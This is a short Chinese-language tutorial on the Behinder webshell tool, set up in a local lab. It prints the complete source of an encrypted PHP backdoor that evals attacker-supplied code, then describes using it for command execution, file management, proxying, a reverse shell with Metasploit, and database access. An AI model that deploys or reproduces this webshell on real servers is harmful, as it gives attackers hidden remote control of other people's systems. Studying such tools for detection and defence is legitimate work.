环境搭建
Web服务器: 本地 win2003(phpstudy搭建)
攻击工具: 冰蝎+kali
具体实施步骤
1、上传webshell
原理参考——>点击
和普通一句话木马类似,需要连接密码。此处为 pass
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __construct($p) {eval($p."");}}
@new C($params);
}
?>
2、用冰蝎连接
双击增加的链接显示出phpinfo()即成功!
3、各个模块使用
3.1 命令执行
3.2 虚拟终端
3.3 文件管理
3.4 Socks代理
注:这个是开在本地的,可监控web服务器的流量
3.5 反弹shell
结合kali里的msf
在kali上开启侦听:
然后在冰蝎上点击“给我连”
3.6数据库管理
冰蝎基本使用至此结束!
附冰蝎连接:https://github.com/rebeyond/Behinder